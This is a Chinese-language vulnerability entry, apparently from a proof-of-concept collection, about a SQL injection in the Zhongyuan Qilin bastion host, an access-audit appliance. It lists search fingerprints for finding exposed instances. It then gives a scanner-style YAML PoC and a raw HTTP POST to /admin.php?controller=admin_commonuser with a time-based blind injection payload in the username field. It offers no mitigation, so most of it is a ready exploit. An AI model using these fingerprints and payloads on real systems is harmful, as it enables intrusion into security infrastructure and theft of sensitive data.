中远麒麟堡垒机SQL注入

中远麒麟堡垒机SQL注入

麒麟堡垒机用于运维管理的认证、授权、审计等监控管理。中远麒麟堡垒机存在SQL注入，可利用该漏洞获取系统敏感信息。

检索条件：

cert="Baolei" 或 title="麒麟堡垒机" 或 body="admin.php?controller=admin_index&action=get_user_login_fristauth"

或 body="admin.php?controller=admin_index&action=login"

poc:
  relative: req0 && req1
  session: false
  requests:
  - method: POST
    timeout: 10
    path: /admin.php?controller=admin_commonuser
    headers:
      Content-Type: application/x-www-form-urlencoded
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/69.0.2786.81 Safari/537.36
    data: username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm
    follow_redirects: true
    matches: (code.eq("200") && time.gt("5") && time.lt("10"))
  - method: POST
    timeout: 10
    path: /admin.php?controller=admin_commonuser
    headers:
      User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML,
        like Gecko) Chrome/69.0.2786.81 Safari/537.36
      Content-Type: application/x-www-form-urlencoded
    data: username=admin
    follow_redirects: true
    matches: time.lt("5")

请求包

POST /admin.php?controller=admin_commonuser HTTP/1.1
Host: ip:port
User-Agent: Mozilla/5.0 (Windows NT 10.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/89.0.4389.114 Safari/537.36
Connection: close
Content-Length: 78
Accept: */*
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip

username=admin' AND (SELECT 6999 FROM (SELECT(SLEEP(5)))ptGN) AND 'AAdm'='AAdm